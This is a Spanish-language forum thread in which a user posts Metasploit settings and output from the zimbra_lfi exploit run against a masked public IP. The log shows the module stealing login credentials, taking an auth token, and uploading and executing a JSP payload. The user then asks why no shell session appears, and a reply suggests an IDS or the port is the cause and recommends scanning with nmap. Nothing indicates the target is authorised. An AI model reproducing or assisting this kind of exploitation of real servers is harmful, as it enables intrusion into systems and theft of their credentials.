Exploit: exploit/unix/webapp/zimbra_lfi
RHOST: la ip al que voy a "atacar"
LHOST: ip local de la maquina virtual
puertos: Default RPORT : 7071 y Local: 4444
Y lo que me pasa es esto:
- 200..x.xx.x.x:7071 - Getting login credentials...
- 200.xx.xxx.xx:7071 - Got login credentials!
- 200.xx.x.xx.x:7071 - Getting auth token...
- 200.xx.x.xxx:7071 - Got auth token!
- 200.xx.xx.x.x.x:7071 - Uploading payload
- 200.xx.x.x.xx:7071 - Uploading jsp stager
- 200.xx.xx.x.x:7071 - Executing payload on /downloads/dwZUmvrbqpKCV.jsp
[!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/dwZUmvrbqpKCV.jsp' on the target
[!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/nCFqzvYjOAFiS' on the target
msf exploit(zimbra_lfi) >
Y que ahí supuestamente tendria que salir la session pero eso no pasa. Creo que puede ser un error de puertos ,dmz o bien el host no es vuln. Ayuda? :P Desde ya muchas gracias
Que te hace creer que el servidor es Vulnerable?
Puede andar de por medio algun amiguito IDS, IPS el cual esta obstruyendo, como tambien el puerto :) le pasaste un nmap o alguna herramienta parecida, para identificar puertos vulnerablidades?
Regards,
Snifer